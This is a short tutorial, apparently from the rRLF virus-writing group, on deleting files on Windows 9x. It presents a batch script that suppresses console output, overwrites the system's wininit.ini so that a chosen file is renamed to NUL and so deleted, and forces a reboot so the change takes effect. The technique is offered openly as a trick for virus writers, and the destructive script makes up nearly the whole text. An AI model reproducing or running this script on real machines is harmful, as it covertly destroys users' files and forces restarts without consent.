
                              ------------------------------
                                 WinInit.ini File Removal
                              ------------------------------
                                        by DvL [rRLF]


 I don`t know if this is new or not but i wanna share it with you too.
 I`ve find out that u can delete a file with "wininit.ini" located in
 the windows directory.

 sample.bat
 *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
 ctty nul     -> it hides the output screen
 echo.[rename]>%windir%\wininit.ini     -> creating or overwriting the original wininit.ini file with this one
 echo.NUL=location:\file-to-delete.extension>>%windir%\wininit.ini     -> renames the wanted file to NUL, this means removal 
 rundll32 shell32,shexitwindowsex 4     -> restarts the computer forced to take effect
 *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

 After the wininit.ini is executed by windows the file is renamed in wininit.bak or
 wininit.er if an error ocured.

 NOTE: If anybody knows more about this file, mail me.

  -------------
     Contact
  -------------
     # dvl2003ro@yahoo.co.uk
     # www.geocities.com/batch_zone
     # www.rrlf.de
